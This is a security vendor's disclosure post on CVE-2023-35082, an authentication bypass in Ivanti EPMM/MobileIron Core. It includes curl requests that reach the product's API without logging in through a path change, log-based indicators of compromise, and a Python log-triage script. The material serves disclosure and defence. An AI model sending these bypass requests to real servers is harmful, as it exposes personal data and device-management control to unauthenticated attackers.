Last updated at Fri, 19 Jan 2024 10:24:39 GMT

When this blog was originally published on August 2, it said that CVE-2023-35082 only affected MobileIron Core 11.2 and earlier, which are unsupported. On August 7, Ivanti published an updated advisory noting that since originally disclosing CVE-2023-35082, they have continued their investigation and have found that the vulnerability impacts all versions of Ivanti Endpoint Manager Mobile (EPMM) 11.10, 11.9 and 11.8, and MobileIron Core 11.7 and below. The risk of exploitation depends on the individual customer’s configurations.

Overview

While investigating CVE-2023-35078, a critical API access vulnerability in Ivanti Endpoint Manager Mobile and MobileIron Core that was exploited in the wild, Rapid7 discovered a new vulnerability that allows unauthenticated attackers to access the API (originally thought to only affect 11.2 and below). Rapid7 reported this vulnerability to Ivanti on July 26, 2023 in accordance with our vulnerability disclosure policy. The new vulnerability was assigned CVE-2023-35082.

Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain, Rapid7 would consider this new vulnerability a patch bypass for CVE-2023-35078. For additional context on CVE-2023-35078 and its impact, see Rapid7’s emergent threat response blog here and our AttackerKB assessment of the vulnerability.

Note: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-35082 to its Known Exploited Vulnerabilities (KEV) list as of January 18, 2024.

Product Description

Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, is a management platform that allows an organization to manage mobile devices such as phones and tablets and to enforce content and application policies on these devices. The product was rebranded to Endpoint Manager Mobile after Ivanti acquired MobileIron in 2020.

Versions 11.8 and above of the product are Endpoint Manager Mobile. The version of the product Rapid7 determined was vulnerable to CVE-2023-35082 is MobileIron Core. Before initial disclosure on August 2, Ivanti told Rapid7 that CVE-2023-35082 affects the following versions of the product:

  • MobileIron Core 11.2 and below

As of August 7, 2023, Ivanti has indicated that CVE-2023-35082 affects the following versions of the product:

  • Endpoint Manager Mobile 11.10
  • Endpoint Manager Mobile 11.9
  • Endpoint Manager Mobile 11.8
  • MobileIron Core 11.7 and below

Ivanti has an updated advisory here as of August 7.

Credit

This issue was originally discovered by Stephen Fewer, Principal Security Researcher at Rapid7, and is being disclosed in accordance with Rapid7's vulnerability disclosure policy. Rapid7 thanks Florian Hauser of CODE WHITE for reaching out to us to note that a later version of Endpoint Manager Mobile appeared to be vulnerable to CVE-2023-35082 in tests CODE WHITE was conducting.

Vendor Statement

Ivanti provided the following updated statement to Rapid7 on August 7:

We are grateful to Rapid7 and Stephen Fewer for the discovery of an issue now reported as CVE-2023-35082 in MobileIron Core / Ivanti EPMM. Ivanti has an RPM script available now and is working with customers to help them apply the fix.

We are continuing our investigation into Ivanti Endpoint Manager Mobile (EPMM) and actively working with our customers to mitigate the risk and secure their environment. We will continue to update the Ivanti blog as we have more information.

Impact

CVE-2023-35082 allows a remote unauthenticated attacker to access the API endpoints on an exposed management server. An attacker can use these API endpoints to perform a multitude of operations as outlined in the official API documents, including the ability to disclose personally identifiable information (PII) and perform modifications to the platform. Additionally, should a separate vulnerability be present in the API, an attacker can chain these vulnerabilities together. For example, CVE-2023-35081 could be chained with CVE-2023-35082 to allow an attacker to write malicious webshell files to the appliance, which may then be executed by the attacker.

Exploitation

In our testing of CVE-2023-35078, we had access to MobileIron Core version 11.2.0.0-31. After reproducing the original vulnerability, we proceeded to apply Ivanti’s hotfix ivanti-security-update-1.0.0-1.noarch.rpm as per the Ivanti Knowledge Base article 000087042. We verified that the hotfix does successfully remediate CVE-2023-35078. However, we found a variation of the same attack that enables a remote attacker to access the API endpoints without authentication.

First we installed MobileIron Core 11.2.0.0-31 and verified we could leverage CVE-2023-35078 to access an API endpoint unauthenticated. Note the inclusion of the /aad/ segment in the URL path to exploit the original vulnerability, CVE-2023-35078.

c:\> curl -k https://192.168.86.103/mifs/aad/api/v2/ping
{"results":{"apiVersion":2.0,"vspVersion":"VSP 11.2.0.0 Build 31 "}}

We then installed the vendor-supplied hotfix ivanti-security-update-1.0.0-1.noarch.rpm. After we rebooted the system, we verified the hotfix prevents the original exploit request shown above.

c:\> curl -k https://192.168.86.103/mifs/aad/api/v2/ping
<html>
<body>
        <h2>HTTP Status 403 - Access is denied</h2>
        <h3>You are unauthorized to access this page.</h3>
</body>
</html>

However, a variation of the above request is still able to access the API endpoints without authentication, as shown below. Note the use of /asfV3/ in the URL path in place of the original exploit’s use of /aad/.

c:\> curl -k https://192.168.86.103/mifs/asfV3/api/v2/ping
{"results":{"apiVersion":2.0,"vspVersion":"VSP 11.2.0.0 Build 31 "}}

Indicators of Compromise

The following indicators of compromise are present in the Apache HTTP logs stored on the appliance.

The log file /var/log/httpd/http-access_log will have an entry showing a request to a targeted API endpoint, containing /mifs/asfV3/api/v2/ in the path with an HTTP response code of 200. Blocked exploitation attempts will show an HTTP response code of either 401 or 403. For example:

192.168.86.34:61736 - - 2023-07-28--15-24-51 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 200 68 "-" "curl/8.0.1" 3285

Similarly, the log file /var/log/httpd/http-request_log will have an entry showing a request to a targeted API endpoint containing /mifs/asfV3/api/v2/ in the path. For example:

2023-07-28--15-24-51 192.168.86.34 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 68 "-" "curl/8.0.1"

Note that log entries containing /mifs/asfV3/api/v2/ in the path indicate exploitation of CVE-2023-35082, whilst log entries containing /mifs/aad/api/v2/ in the path indicate exploitation of CVE-2023-35078.
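
The triage rules above can be applied to http-access_log with a short script. This is an added example, not Rapid7's or Ivanti's tooling; the field layout is inferred from the single sample entry quoted above, the names classify and scan are hypothetical, and the sample lines after the first are constructed. It does not parse http-request_log, which uses a different layout.

```python
import re
from collections import namedtuple

# Path markers and the CVE each one indicates, as stated in the post.
MARKERS = {"/mifs/asfV3/api/v2/": "CVE-2023-35082",
           "/mifs/aad/api/v2/": "CVE-2023-35078"}

# Field layout inferred from the one http-access_log entry quoted in the post (assumption).
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ (?P<ts>\S+) '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

Hit = namedtuple("Hit", "cve outcome src ts path status")

def classify(line):
    """Return a Hit if the line matches either indicator, else None."""
    m = ACCESS_RE.match(line)
    if not m:
        return None  # unparseable line or a different log format
    path = m.group("path")
    cve = next((c for marker, c in MARKERS.items() if marker in path), None)
    if cve is None:
        return None
    status = int(m.group("status"))
    if status == 200:
        outcome = "successful"   # API answered the request
    elif status in (401, 403):
        outcome = "blocked"      # attempt rejected, per the post
    else:
        outcome = "review"       # status the post does not cover
    return Hit(cve, outcome, m.group("src"), m.group("ts"), path, status)

def scan(lines):
    """Classify every line and keep only the indicator hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample input: the first entry is the post's own example, the rest are made up.
SAMPLE = [
    '192.168.86.34:61736 - - 2023-07-28--15-24-51 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 200 68 "-" "curl/8.0.1" 3285',
    '192.168.86.34:61740 - - 2023-07-28--15-25-02 "GET /mifs/aad/api/v2/ping HTTP/1.1" 403 153 "-" "curl/8.0.1" 2911',
    '192.168.86.50:50112 - - 2023-07-28--15-26-10 "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 10422',
    'truncated line without a request',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit.ts, hit.src, hit.cve, hit.outcome, hit.status, hit.path)
```

To run it against a real appliance log, pass an open file handle for /var/log/httpd/http-access_log to scan() in place of SAMPLE.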

Remediation

As noted in their advisory, Ivanti has an RPM Fix for versions 11.10 to 11.3 available as of August 7, 2023. Customers on older versions should first upgrade to 11.10 and then apply the RPM fix. More information is available in a Knowledge Base article on the Ivanti Community portal.

Rapid7 advises MobileIron Core customers to upgrade to a supported version as soon as possible. Customers running Endpoint Manager Mobile versions vulnerable to CVE-2023-35082 should apply Ivanti's RPM Fix as soon as possible, without waiting for a regular patch cycle to occur.

Rapid7 Customers

An unauthenticated vulnerability check for CVE-2023-35082 is available to InsightVM and Nexpose customers as of the August 2, 2023 content release.

Timeline

  • July 26, 2023: Rapid7 sends disclosure information to Ivanti security.
  • July 28, 2023: Rapid7 contacts Ivanti via a second channel to confirm receipt of disclosure information. Ivanti confirms initial disclosure was not received. Rapid7 resends disclosure documents. Ivanti confirms receipt.
  • July 28, 2023: Ivanti confirms findings.
  • July 31, 2023: Ivanti confirms a security advisory will be published, requests a call with Rapid7 to address what they consider inaccuracies in our disclosure.
  • August 1, 2023: Rapid7 and Ivanti discuss the two vulnerabilities (CVE-2023-35078, CVE-2023-35082). Rapid7 agrees to update this disclosure with points of clarification to highlight Ivanti’s perspective. Rapid7 also agrees to clarify product terminology (i.e., that CVE-2023-35082 only affects MobileIron Core, not later versions of the product which were renamed Endpoint Manager Mobile).
  • August 2, 2023: This disclosure.
  • August 3-4, 2023: An external research contact, Florian Hauser of CODE WHITE, reaches out to Rapid7 to disclose that they have discovered that the latest version (at the time) of Endpoint Manager Mobile, 11.10.03 Build 2, was vulnerable to CVE-2023-35082 in a specific configuration. Rapid7 contacts Ivanti, who indicates they are investigating.
  • August 6, 2023: Ivanti confirms to Rapid7 that additional versions of the product are vulnerable to CVE-2023-35082, proposes an August 7 disclosure that will note new fixes.
  • August 7, 2023: This updated disclosure.
  • January 18, 2024: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-35082 to its Known Exploited Vulnerabilities (KEV) list.